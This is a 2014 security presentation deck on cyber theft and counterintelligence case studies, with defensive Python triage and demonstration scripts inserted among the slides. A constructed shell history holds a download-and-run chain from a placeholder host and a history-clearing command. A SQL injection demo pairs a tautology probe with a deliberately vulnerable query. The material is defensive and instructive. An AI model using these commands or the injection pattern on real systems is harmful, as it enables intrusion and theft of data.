The Great Data Robbery: Cyber theft and the risks to your organization

February 11, 2014, 9:45AM – 11:30AM


Contents

1. Presenters

2. Background

3. The threat

4. Risks to your organization

5. What your organization can / should be doing

6. The role of Cyber counterintelligence


Presenters

• Brittany Teare, Weaver – Manager, IT Advisory Services

• Brian Thomas, Weaver – Partner, IT Advisory Services

• Doug Helton, SpearTip – Director of Counterintelligence


Weaver IT Advisory Services

IT Audit
– IT internal audit, external audit support, SOX, SOC reporting

Information Security
– Penetration testing
– Vulnerability assessment
– ISO 27001
– Data privacy

IT Consulting
– Independent verification & validation
– IT assessments and planning
– Project risk management

Analytics
– Audit preparation
– Audit support
– Forensics support
– Management analytics
– Continuous monitoring


“Some organizations will be a target regardless of what they do, but most become a target because of what they do. If your organization is indeed a target of choice, understand as much as you can about what your opponent is likely to do and how far they are willing to go.”

– 2013 DBIR, p. 48


Background

• In 2013, there are two kinds of companies – those that have been breached, and those that know they’ve been breached.

– Who are the victims of breaches?

• 38% larger organizations+
• 37% financial organizations+
• 24% retail and restaurants
• 20% manufacturing, transportation, utilities+
• 20% professional services firms+


The Threat

• Who are the bad guys? Depends on what information assets or systems you have. Could be:
– Nation states like China, Russia, Iran, North Korea
– Hacktivists (Anonymous, Wikileaks)
– Terrorist organizations
– Organized crime


The Threat (cont.)

• What do they want? Depends on what information assets or systems you have. Could be:
– Defense secrets
– Disruption of critical infrastructure
– Trade secrets and intellectual property
– Confidential information about your organization, your business dealings, or your customers
– Exploitable consumer financial information


The Threat (cont.)

– How do breaches occur?

• 52% some form of hacking
• 76% exploitation of weak or stolen credentials
• 40% malware
• 35% physical attacks+
• 29% social tactics+
• 13% privileged misuse or abuse

– What are the commonalities?

• Financial motives, targeted user devices, compromised servers, opportunistic attacks, discovery by external parties, time of discovery is multiple months, low difficulty of initial intrusion


Risks to Organizations

• Key risks of cyber theft:
– Liability for loss of confidential information, loss of private consumer information, business interruption, or even loss of human life
– Loss of intellectual property / trade secrets / competitive advantage
– Damage from loss of confidentiality
– Reputational damage


Risk Impact

• Gone are the days when we could bury our heads in the sand. Liability is increasing:
– Target
– Yahoo
– CF Disclosure Guidance: Topic No. 2 – Cybersecurity


What to Do

“Prevention is ideal, detection is a must!”


What to Do

• Organizations should:
– Classify data
– Implement an ISMS
– Implement tools to identify security events
– Perform periodic security assessments based on the specific threats
– Consider cyber counterintelligence


Cyber Counterintelligence – Case Studies


Cyber Counterintelligence - Overview

What is cyber counterintelligence (Cyber CI)?
– Historical roots
– Increased awareness and demand

Who is SpearTip?
– Military CI and LE agents
– Deep technical expertise

Why is Cyber CI relevant?


Cyber Counterespionage – Chinese Scientist

• East Coast – NanoTech Research Facility
• Accepted position back in Beijing
• Gaining elevated access to sensitive information
• Copying the hard drive and placing it in new system
• Download and use of hacking software
• Introducing malware into environment


Cyber Counterespionage – Chinese Scientist

• Forensic analysis identified the malicious file “FFE3.CB5” at the following location on the subject system: C:\Documents and Settings\<user>\Application Data\2CB5F\FFE3.CB5
• This file was identified by the malware scanning software Sophos as “Trojan.CycBotCn-A”
• This particular malware creates a “backdoor” which allows unauthorized remote access to the subject system
• This file was located on the subject system at the aforementioned location. Below is a screenshot of this file with its creation date and time
• In addition to the malicious file, SpearTip also discovered the presence of an attribute changer
• This type of software has the ability to modify date and time stamps within any active file within the file system
• Attribute changers are most often used for nefarious purposes, such as to cover one’s tracks following an exploitation or security breach


Cyber Counterespionage – Chinese Scientist

• The subject was also conducting research on how to image a hard drive and how to connect two systems via a USB cable

• Following this research, subject then searched the Internet in an attempt to locate and purchase a laptop that was identical to his company issued laptop

• It was later discovered that he had, indeed, purchased two laptops of the same make and model as HIS company issued laptop

• During SpearTip’s malware analysis, this application was identified as attempting to access the registry framework of the installed host-based antivirus solution

• The corporation’s IT staff was completely unaware of subject’s malicious activity or the malware threat within their network environment



Cyber Counterespionage – Chinese Scientist

• Organization’s R&D server was attempting to communicate within the network environment to an Exchange Server


Cyber Counterespionage – Chinese Scientist

• Some of the most recent discoveries have identified yet another method of exfiltrating sensitive data from corporate environments, such as deploying a remotely accessible cellular device

• In order to detect and analyze this new technique, specialized hardware and software components are required to process the various electronic signals emanating from these devices

• This equipment can provide the Cyber Counterintelligence operator a platform that can detect, identify, assess, counter, exploit and/or neutralize this type of threat

• The following examples are equipment that could be used for this type of cyber espionage activity

NAC/802.1x Bypass. In addition to supporting both 3G and Wireless connectivity, the plug & play devices can bypass virtually all NAC/802.1x/RADIUS implementations, providing a reverse shell backdoor and full connectivity to NAC-restricted networks


Cyber Counterespionage – Romanian Hack Team

• SpearTip personnel were contacted to respond to an intrusion involving a RedHat server that hosted a tremendous amount of proprietary data

• It was determined that this information was not compromised, although the point of intrusion still needed to be determined for remediation planning

• It was determined that the compromise included the initial exploit, the addition of the “elvis” user, upload of malicious files, and the Romanian attackers then proceeding to utilize this server to carry out their eBay/PayPal phishing scam

• On November 19, 2007, the server began sustaining brute force ssh login attacks

• This appeared to be a scripted attack, but however related it may have been, it is highly unlikely to have led to the compromise itself, as the attackers had a much easier exploit available

• Logs appear to have been manipulated given inexplicable inconsistencies in syslogd timestamps. Syslogd does not log local events out of sequence; therefore information within the log cannot be entirely trusted. Timestamp anomalies are very often a tell-tale sign of rootkits.
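The two signals on this slide, syslogd timestamps that step backwards and a burst of failed ssh logins from one source, are both mechanical checks a responder can run over the raw log. The script below is an added example, not SpearTip's tooling or output from this case; the log lines are constructed (only the "elvis" account name comes from the slides), the year 2007 is pinned because classic BSD syslog lines carry none, and the 60-second window and threshold of 5 are assumed tuning values.

```python
"""Auth-log triage: out-of-sequence syslog timestamps and SSH brute-force bursts.
Added example, not from the incident on the slides; the log lines are constructed
(the 'elvis' account name is the one the slides mention)."""
import re
from datetime import datetime

# Classic BSD syslog timestamps carry no year; we pin one for parsing (assumption).
LOG_YEAR = 2007

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)

# Constructed sample: a scripted password-guessing burst in November, then the
# account creation in December followed by a line whose timestamp runs backwards.
SAMPLE_LOG = """\
Nov 19 03:12:01 rh5 sshd[2201]: Failed password for root from 203.0.113.7 port 40122 ssh2
Nov 19 03:12:03 rh5 sshd[2203]: Failed password for root from 203.0.113.7 port 40131 ssh2
Nov 19 03:12:05 rh5 sshd[2205]: Failed password for invalid user admin from 203.0.113.7 port 40140 ssh2
Nov 19 03:12:07 rh5 sshd[2207]: Failed password for root from 203.0.113.7 port 40150 ssh2
Nov 19 03:12:09 rh5 sshd[2209]: Failed password for root from 203.0.113.7 port 40161 ssh2
Nov 19 03:12:11 rh5 sshd[2211]: Failed password for oracle from 203.0.113.7 port 40170 ssh2
Nov 19 03:15:44 rh5 sshd[2230]: Failed password for root from 198.51.100.9 port 51002 ssh2
Dec 18 10:12:20 rh5 useradd[3101]: new user: name=elvis, UID=502, GID=502, home=/home/elvis, shell=/bin/bash
Dec 18 09:40:02 rh5 sshd[3120]: Accepted password for elvis from 198.51.100.23 port 3344 ssh2
Dec 18 10:15:33 rh5 cron[3140]: (root) CMD (run-parts /etc/cron.hourly)
"""


def parse_line(line):
    """Split one syslog line into timestamp, host, program and message; None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "prog": m["prog"], "msg": m["msg"], "raw": line}


def out_of_sequence(lines):
    """Return (line_no, previous_ts, this_ts) for every line whose timestamp precedes
    the previous parsed line.  syslogd writes local events in order, so a backwards
    step means the file was edited or the clock was moved.  (A Dec->Jan rollover
    would also trip this check because the year is pinned; treat that case by hand.)"""
    anomalies, prev = [], None
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        if prev is not None and rec["ts"] < prev:
            anomalies.append((n, prev, rec["ts"]))
        prev = rec["ts"]
    return anomalies


def brute_force_sources(lines, window_seconds=60, threshold=5):
    """Map source IP -> peak number of failed SSH logins inside any window_seconds span,
    keeping only sources at or above threshold."""
    attempts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["prog"].startswith("sshd"):
            continue
        m = FAILED_RE.search(rec["msg"])
        if m:
            attempts.setdefault(m["ip"], []).append(rec["ts"])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for n, prev, cur in out_of_sequence(lines):
        print(f"line {n}: {cur:%b %d %H:%M:%S} precedes previous entry {prev:%b %d %H:%M:%S}")
    for ip, count in brute_force_sources(lines).items():
        print(f"{ip}: {count} failed SSH logins within 60s")
```

The sequence check only proves the file is untrustworthy, as the slide says; it does not tell you which entries were altered, so corroborate against sources the attacker could not reach (a remote syslog collector, NetFlow, the sshd connection records on a bastion host).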


Cyber Counterespionage – Romanian Hack Team

• On December 18, 2007 at 1012 hours an account and group were created under the username “elvis”

• This server was accessed via the elvis username throughout the Internet from December 18 through December 21, ending only after Source1 deleted the user account

• Not only does the fact that elvis came from so many IPs stand out, it may be noteworthy to mention that their backdoored sshd server can bind as many ports as are open

• In an effort to determine further activity of the attackers, an exhaustive search for all and any remnants of the “.bash_history” file was undertaken

• As shown below, once the attacker gained ssh access, he downloaded and ran multiple exploits and backdoors


Cyber Counterespionage – Romanian Hack Team

• According to the information contained within the attacker’s .bash_history file, it appears that the attack vector that SUBJECTS utilized is a file called windmilk.jpg or windmilk.tgz

• Both files are simple gzipped tar files containing the superwu binary. A screenshot of the attack tool can be seen below

• Further analysis led not only to the determination of the attacker’s tools, but references to some of their friends as well

• These friends steered the investigation to look into other members of the hacker group

• The “brains” of the operation seemed to be Claudiu Catalin, seen below with another member of the team, Iordache:
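The slides reconstruct the intrusion from recovered .bash_history fragments: a download, an archive disguised with an image extension, and binaries run from the working directory. The script below is an added example of how a responder can triage such fragments mechanically; it is not SpearTip's tool. The history lines are constructed, reusing only the windmilk.jpg and superwu names from the slides, and the download host address is a documentation-range placeholder.

```python
"""Triage of recovered shell-history lines for download-and-execute chains and
anti-forensics.  Added example; the history is constructed, using only the file
names the slides mention (windmilk.jpg, superwu)."""
import shlex

DOWNLOADERS = {"wget", "curl", "ftp", "scp"}
EXTRACTORS = {"tar", "gunzip", "unzip"}
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

# Constructed history fragment (203.0.113.50 is a documentation-range placeholder).
SAMPLE_HISTORY = """\
cd /tmp
wget http://203.0.113.50/windmilk.jpg
tar xzf windmilk.jpg
cd windmilk
chmod +x superwu
./superwu
ls -la
history -c
""".splitlines()


def triage_history(lines):
    """Return (line_no, command, reason) for commands that look like intrusion
    tooling rather than routine administration.  Each rule is a heuristic; the
    value is in the sequence they form, which the analyst reads in context."""
    findings = []
    for n, cmd in enumerate(lines, 1):
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes in a damaged fragment
            argv = cmd.split()
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        if prog in DOWNLOADERS:
            findings.append((n, cmd, "file download"))
        elif prog in EXTRACTORS and any(a.lower().endswith(IMAGE_EXT) for a in args):
            findings.append((n, cmd, "archive extracted from a file with an image extension"))
        elif prog == "chmod" and any(a.startswith("+") and "x" in a for a in args):
            findings.append((n, cmd, "execute bit set on a file"))
        elif prog.startswith("./") or prog.startswith("/tmp/"):
            findings.append((n, cmd, "execution from the working directory or /tmp"))
        elif prog == "history" and "-c" in args:
            findings.append((n, cmd, "shell history cleared (anti-forensics)"))
    return findings


if __name__ == "__main__":
    for n, cmd, reason in triage_history(SAMPLE_HISTORY):
        print(f"{n:3d}  {cmd:<45} {reason}")
```

Because the attacker on this slide cleared history, the input to this function is usually carved from unallocated space rather than read from the live file, which is why the parser tolerates broken quoting instead of failing on it.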


Cyber Counterespionage – AnonymouSTL

• SpearTip personnel were contacted to respond to an incident involving an employee utilizing corporate assets to conduct numerous high-profile intrusions to US government and international websites in the name of AnonymouSTL

• A forensic analysis of email activity on SUBJECT’s system was conducted that identified several emails that demonstrate that HE specifically sought and requested Structured Query Language (SQL) training, paid for by the corporation

• While this type of training is not out of the ordinary for someone with subject’s professional responsibilities, training and knowledge of this programming language could be useful for an individual whose intentions are to launch website and network-based attacks using SQL Injections

• A SQL Injection is an attack using SQL statements on a poorly designed website, with the intention of compromising a database of information on the website, often exposing that information to the attacker

• During the forensic analysis, several “session” folders were located for the application “W3AF”. This software is used for penetrating and finding weaknesses in web applications

• These session folders were found in the “C:\Users\Administrator\.w3af\sessions\” directory on the subject system

• Below is a screenshot of the folder structure from the aforementioned “sessions” directory
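The slide defines SQL injection as an attack on a "poorly designed website" that lets SQL statements reach the database. The added example below, which is not from the case or from the presenters, shows the design flaw and its fix side by side on an in-memory SQLite table: a lookup built by string concatenation lets the supplied value rewrite the WHERE clause, while the same lookup with a bound parameter treats it as data only. The table, rows and `users` schema are constructed.

```python
"""SQL injection: a lookup built by string concatenation beside the parameterised
form that defeats it.  Added example with a constructed in-memory SQLite table;
not code from the incident on the slides."""
import sqlite3


def make_db():
    """Constructed sample table standing in for a site's customer database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, card TEXT)")
    conn.executemany(
        "INSERT INTO users (name, card) VALUES (?, ?)",
        [("alice", "4111-xxxx-xxxx-1111"), ("bob", "5500-xxxx-xxxx-2222")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """The poorly designed form: the user-controlled value is pasted into the SQL
    text, so it can change the statement's structure, not just its data."""
    sql = "SELECT name, card FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """The corrected form: the driver binds the value to a placeholder, so the
    statement's structure is fixed before the value is ever seen."""
    return conn.execute(
        "SELECT name, card FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"      # classic tautology probe
    print("vulnerable:", lookup_vulnerable(db, probe))   # every row leaks
    print("safe      :", lookup_safe(db, probe))         # no row named that
    print("safe, real:", lookup_safe(db, "alice"))
```

The fix is structural, not a filter on quote characters: parameter binding keeps the query shape constant for every input, which is also what makes the vulnerable version detectable in code review (look for SQL text assembled with `+` or `%` from request data).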


Cyber Counterespionage – AnonymouSTL

• An analysis of these session folders was conducted

• It was determined from this analysis that scanning, using this application, was conducted on the following dates:

• An analysis of the history of websites visited was conducted on subject’s system, focusing on the timeframe following the LogMeIn logon activity at 10:56PM CST

• Below is a listing of this Internet activity

• The dates associated with this listing represent the last time the respective URL was visited

• The listing below shows subject accessing several websites with the domain “.ir”

• The domain “.ir” is a Top Level Domain Country Code for the country of Iran

• The text “func=download” in the Uniform Resource Locators (URLs) for “http://tehran.mim.gov.ir” indicates there were download attempts made from this website

www.bankofamerica.com – December 8, 2011
www.winningtech.com – December 8, 2011
www.mayorslay.com – December 13, 2011
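The two observations the analysts drew from the browsing history, the country-code TLD of the visited hosts and the func=download query parameter, can be extracted from a history export with the standard URL parser. The script below is an added example, not the presenters' tooling: the host tehran.mim.gov.ir, the func=download parameter and the listed hosts and dates come from the slides, while the full URL paths and query strings and the id=42 value are constructed, and the set of watched ccTLDs and parameters is an assumed configuration.

```python
"""Browsing-history triage: group visited hosts by country-code TLD and flag
watched query parameters.  Added example; paths, query strings and the id value
are constructed, hosts and dates are those the slides list."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Assumed watch-lists for this investigation.
WATCHED_CCTLDS = {"ir": "Iran", "il": "Israel"}
WATCHED_PARAMS = {"func": {"download"}}

SAMPLE_HISTORY = [
    ("2011-12-08", "http://www.bankofamerica.com/"),
    ("2011-12-13", "http://www.mayorslay.com/"),
    ("2012-01-09", "http://tehran.mim.gov.ir/index.php?func=download&id=42"),   # constructed path/query
    ("2012-01-09", "http://tehran.mim.gov.ir/index.php?func=view&id=42"),       # constructed
    ("2012-01-10", "http://www.tamar.co.il/"),
]


def cctld(host):
    """Two-letter final label of a hostname, or None.  Note that second-level
    registries such as co.il still resolve to the country label."""
    last = host.rsplit(".", 1)[-1].lower()
    return last if len(last) == 2 and last.isalpha() else None


def triage_urls(records):
    """Return ({country: [(date, host), ...]}, [(date, url), ...]) for visits to
    watched country-code TLDs and for URLs carrying a watched parameter value."""
    by_country = defaultdict(list)
    param_hits = []
    for date, url in records:
        parts = urlsplit(url)
        host = parts.hostname or ""
        cc = cctld(host)
        if cc in WATCHED_CCTLDS:
            by_country[WATCHED_CCTLDS[cc]].append((date, host))
        query = parse_qs(parts.query)
        for key, wanted in WATCHED_PARAMS.items():
            if wanted & set(query.get(key, [])):
                param_hits.append((date, url))
    return dict(by_country), param_hits


if __name__ == "__main__":
    countries, hits = triage_urls(SAMPLE_HISTORY)
    for country, visits in countries.items():
        print(country, visits)
    for date, url in hits:
        print("download attempt:", date, url)
```

A ccTLD match is context, not evidence of wrongdoing on its own; on the slides it became meaningful only when joined to the download parameter and to the dates of the attacks on .il sites that follow.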


Cyber Counterespionage – AnonymouSTL

• The aforementioned download files contain sensitive information such as usernames, credit card numbers and the senders, recipients, and body of various emails

• Below is a screenshot of a single instance of the contents of these .html files, with sensitive information removed

• SpearTip’s analysis found that these attacks occurred on the following websites on the following dates:

http://albayan.co.il – 1/9/2012
www.avicom.co.il – 1/9/2012
home.geoenv.biu.ac.il – 1/9/2012
www.salt.co.il – 1/9/2012
www.IAPE.org.il – 1/10/2012
www.IAPP.org.il – 1/10/2012
www.tamar.co.il – 1/10/2012
www.isratim.co.il – 1/11/2012

CREDICCARDS.html


Cyber Counterespionage – AnonymouSTL

• This forensic analysis included the correlation of data on the subject system with suspected Twitter postings by subject using the screen name “AnonymouSTL”

• The subject system was analyzed to determine if a Twitter account using this username was accessed from this system

• The following twitter posting was located on www.twitter.com for the user “AnonymouSTL”

• This posting further corroborates the SUBJECT’S involvement in the compromising of websites with “.il” domains

data-screen-name="_AnonymouSTL_" data-user-id="424567950"
“You can take my life, you can take my freedom, but you will NEVER TAKE MY PASTEBIN! THIS IS ACCOUNT #6... BETTER LUCK THIS TIME?!?!? #freespeech=shit”


Cyber Counterespionage – AnonymouSTL

These postings are also just prior to the SQL Injection attacks launched by subject on the websites within the “.il” domain, on January 9, 10 and 11


Cyber CI – Key Focus Areas

Intelligence-driven risk management

Evaluate program effectiveness

Validate internal threat and risk assessment


Cyber CI – Application

Recent examples from SpearTip clients

Assess info sec and data classification policies effectiveness

Develop and refine fraud controls

Assess access management program


Conclusion

Questions/Discussion


Contacts


Douglas G. Helton
Director of Counterintelligence
Tel: 469.601.7564
Email: [email protected]

Brian J. Thomas, CISA, CISSP
Partner, Advisory Services
Tel: 713.800.1050
Email: [email protected]
@IT_Risk

Brittany George Teare, CISA
Manager, Advisory Services
Tel: 972.448.9299
Email: [email protected]